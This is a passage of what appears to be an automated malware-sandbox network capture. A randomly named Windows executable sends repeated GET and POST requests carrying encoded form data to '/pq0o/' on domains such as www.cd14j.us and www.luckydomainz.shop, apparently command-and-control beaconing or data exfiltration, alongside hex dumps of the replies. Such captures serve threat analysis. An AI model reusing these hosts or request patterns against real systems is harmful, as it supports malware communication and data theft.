FdpPXWjjV52ByFwY+XfEUq5ybuQftgYPbCEGtQdUuDmXPP8NwFjbL3/uYDeVqCZ8OGREzv8ahNfJM7GvQxvn2mZjidfaOZ9G2f7TlMXl4kkNx/qwW4g==
Apr 23, 2024 08:38:54.218992949 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:38:54 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49724	91.195.240.19	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:38:56.759449005 CEST	371	OUT	GET /pq0o/?sHlxgpX=zlo+FGSBhCkM5GVOiSRgbmytEbX4vu088Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mJUabQMjhSVlFurdcd91J2fhXl/3bZKBIsDf+Ls10KGv+Sw==&Lx=8PqlJ028VT_ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 23, 2024 08:38:57.670466900 CEST	1289	IN	HTTP/1.1 200 OK date: Tue, 23 Apr 2024 06:38:57 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_qcCPcx3BKrAOhNXiv7e1ejXlVLVVwC7OlTA2Zw1QaygYbiN5x65ymNI/Gthz3NnUbQE+NlNFWVFYikXTovQuIw== last-modified: Tue, 23 Apr 2024 06:38:56 GMT x-cache-miss-from: parking-55fd589654-8mkkq server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 71 63 43 50 63 78 33 42 4b 72 41 4f 68 4e 58 69 76 37 65 31 65 6a 58 6c 56 4c 56 56 77 43 37 4f 6c 54 41 32 5a 77 31 51 61 79 67 59 62 69 4e 35 78 36 35 79 6d 4e 49 2f 47 74 68 7a 33 4e 6e 55 62 51 45 2b 4e 6c 4e 46 57 56 46 59 69 6b 58 54 6f 76 51 75 49 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_qcCPcx3BKrAOhNXiv7e1ejXlVLVVwC7OlTA2Zw1QaygYbiN5x65ymNI/Gthz3NnUbQE+NlNFWVFYikXTovQuIw==><head><meta charset="utf-8"><title>luckydomainz.shop - luckydomainz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luckydomainz.shop is your first and best source for all of the information youre looking for. Fro
Apr 23, 2024 08:38:57.670533895 CEST	1289	IN	Data Raw: 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 20 Data Ascii: m general topics to more of what you would expect to find here, luckydomainz.shop has it all. We hope yAECou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/
Apr 23, 2024 08:38:57.670572042 CEST	1289	IN	Data Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b Data Ascii: idden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance
Apr 23, 2024 08:38:57.670609951 CEST	1289	IN	Data Raw: 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f Data Ascii: ground:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.c
Apr 23, 2024 08:38:57.670648098 CEST	1289	IN	Data Raw: 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e Data Ascii: ontent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-
Apr 23, 2024 08:38:57.670685053 CEST	1289	IN	Data Raw: 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 Data Ascii: n:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550
Apr 23, 2024 08:38:57.670723915 CEST	1289	IN	Data Raw: 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d Data Ascii: 83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opac
Apr 23, 2024 08:38:57.670763016 CEST	1289	IN	Data Raw: 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 Data Ascii: h:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147px;flex-grow:
Apr 23, 2024 08:38:57.670799017 CEST	1289	IN	Data Raw: 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 77 61 20 Data Ascii: --twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6e
Apr 23, 2024 08:38:57.670836926 CEST	1026	IN	Data Raw: 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 Data Ascii: p:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list
Apr 23, 2024 08:38:57.845993996 CEST	1289	IN	Data Raw: 35 36 46 0d 0a 6c 73 65 2c 22 70 75 22 3a 22 2f 2f 77 77 77 2e 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61 6c 73 65 2c 22 74 6f 53 65 6c 6c 22 3a 66 61 6c 73 65 2c 22 63 Data Ascii: 56Flse,"pu":"//www.luckydomainz.shop","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49725	91.195.240.123	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:03.420443058 CEST	608	OUT	POST /pq0o/ HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.cd14j.us Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cd14j.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 2b 66 67 68 4a 66 4a 57 74 64 53 58 75 79 4a 77 30 4f 31 51 66 73 5a 48 45 71 72 50 68 65 53 71 7a 71 43 46 57 53 78 41 64 69 4b 45 5a 2f 6e 34 38 77 5a 70 52 68 58 6a 6e 64 4b 57 2f 4d 54 66 74 47 33 4e 79 32 32 48 78 45 45 71 37 32 32 32 6a 55 39 36 46 47 38 73 71 5a 56 6d 38 59 31 46 49 65 69 50 56 55 44 6a 69 6e 6e 4c 52 41 45 30 53 46 5a 6e 75 56 44 2b 54 33 43 62 75 4c 6c 31 43 32 52 67 45 76 58 63 76 50 71 72 35 67 4d 4d 62 38 49 39 77 56 52 6f 37 38 78 44 36 79 32 56 71 50 58 35 6a 4b 51 38 58 62 72 4d 57 72 4b 65 61 6d 69 68 77 43 51 71 48 55 64 52 53 77 30 4c 4f 58 69 7a 58 32 30 3d Data Ascii: sHlxgpX=+fghJfJWtdSXuyJw0O1QfsZHEqrPheSqzqCFWSxAdiKEZ/n48wZpRhXjndKW/MTftG3Ny22HxEEq7222jU96FG8sqZVm8Y1FIeiPVUDjinnLRAE0SFZnuVD+T3CbuLl1C2RgEvXcvPqr5gMMb8I9wVRo78xD6y2VqPX5jKQ8XbrMWrKeamihwCQqHUdRSw0LOXizX20=
Apr 23, 2024 08:39:03.596137047 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:39:03 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49726	91.195.240.123	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:06.134567976 CEST	628	OUT	POST /pq0o/ HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.cd14j.us Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cd14j.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 2b 66 67 68 4a 66 4a 57 74 64 53 58 75 53 5a 77 7a 76 31 51 49 38 5a 41 59 36 72 50 6f 2b 54 68 7a 71 47 46 57 51 64 70 64 30 53 45 65 62 76 34 37 42 5a 70 53 68 58 6a 2f 4e 4b 54 79 73 54 69 74 47 71 77 79 32 4b 48 78 41 55 71 37 32 47 32 6b 69 31 39 45 57 38 75 69 35 56 6b 79 34 31 46 49 65 69 50 56 51 54 46 69 6e 50 4c 53 77 55 30 54 6b 5a 6b 74 56 44 2f 55 33 43 62 39 62 6c 78 43 32 52 4f 45 74 6a 6d 76 4c 61 72 35 69 55 4d 62 74 49 79 70 46 51 6a 31 63 77 32 35 77 58 6a 79 75 65 32 6d 37 64 50 42 74 7a 6e 58 64 6e 30 41 45 71 4a 6a 69 38 53 58 48 56 6d 44 41 56 69 55 30 79 44 4a 68 68 34 72 4e 79 52 6d 42 45 35 5a 6a 67 62 63 79 45 4f 38 65 74 59 Data Ascii: sHlxgpX=+fghJfJWtdSXuSZwzv1QI8ZAY6rPo+ThzqGFWQdpd0SEebv47BZpShXj/NKTysTitGqwy2KHxAUq72G2ki19EW8ui5Vky41FIeiPVQTFinPLSwU0TkZktVD/U3Cb9blxC2ROEtjmvLar5iUMbtIypFQj1cw25wXjyue2m7dPBtznXdn0AEqJji8SXHVmDAViU0yDJhh4rNyRmBE5ZjgbcyEO8etY
Apr 23, 2024 08:39:06.312479019 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:39:06 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49727	91.195.240.123	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:09.549199104 CEST	1645	OUT	POST /pq0o/ HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.cd14j.us Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cd14j.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 2b 66 67 68 4a 66 4a 57 74 64 53 58 75 53 5a 77 7a 76 31 51 49 38 5a 41 59 36 72 50 6f 2b 54 68 7a 71 47 46 57 51 64 70 64 30 61 45 65 70 33 34 38 57 6c 70 54 68 58 6a 33 74 4b 53 79 73 54 46 74 47 6a 37 79 32 47 39 78 43 63 71 37 58 6d 32 6c 58 56 39 64 47 38 75 67 35 56 6c 38 59 31 63 49 65 53 44 56 55 50 46 69 6e 50 4c 53 32 6f 30 46 46 5a 6b 72 56 44 2b 54 33 43 50 75 4c 6c 4a 43 32 4a 34 45 74 6d 62 75 34 53 72 36 43 45 4d 63 66 77 79 68 46 51 68 34 38 77 75 35 77 62 77 79 75 54 4a 6d 37 70 6c 42 71 66 6e 62 6f 4f 53 63 46 62 58 36 68 39 7a 45 6b 5a 4c 42 56 5a 76 64 45 4b 48 49 52 68 4f 67 75 4c 7a 6e 47 30 66 64 68 55 66 47 6d 6b 43 77 4c 6c 5a 59 35 37 70 77 62 37 48 32 66 64 77 30 54 53 57 47 49 77 34 76 36 5a 33 7a 45 47 42 62 4e 42 6b 74 50 4e 57 70 5a 34 73 4b 38 68 37 42 4e 58 52 4b 66 46 77 36 2b 4d 65 42 41 4e 79 32 44 2b 4c 79 77 75 68 6e 49 4e 68 48 51 39 75 62 6d 30 2b 34 49 44 71 6b 5a 2b 38 69 48 55 64 6c 75 54 53 79 4c 43 76 71 69 7a 54 76 61 64 58 70 6f 55 30 79 57 45 56 67 47 70 2b 44 56 46 6d 39 42 6a 54 32 47 37 73 43 5a 4d 50 36 65 6d 6b 4c 4d 64 6c 75 33 7a 70 63 2b 2b 34 6f 44 34 6f 73 44 75 43 79 48 7a 67 49 32 68 49 42 65 68 76 4f 66 6d 31 36 63 47 50 63 55 53 6c 54 4e 76 45 55 52 5a 66 4a 38 59 69 34 53 53 34 6c 6e 74 32 72 69 38 4f 63 61 69 67 65 4c 53 32 4d 39 7a 4c 36 39 37 4c 6c 55 35 77 78 44 42 2f 67 78 39 30 4c 47 43 32 4f 50 30 77 79 6c 50 62 6d 37 77 6d 38 57 71 63 78 64 37 50 30 6f 6f 4c 49 55 4c 6a 65 32 4a 4f 41 38 7a 73 51 4c 74 79 4e 51 72 79 36 69 33 5a 68 2f 6a 6b 52 75 4c 36 2b 6e 7a 54 59 78 71 42 47 32 70 48 73 77 2f 66 41 65 63 73 38 70 76 71 33 63 55 54 71 72 55 75 57 43 54 43 57 32 45 42 58 66 50 57 6e 35 38 64 35 39 4e 31 77 4b 69 79 4b 5a 64 43 43 66 4c 42 58 73 38 47 5a 4a 75 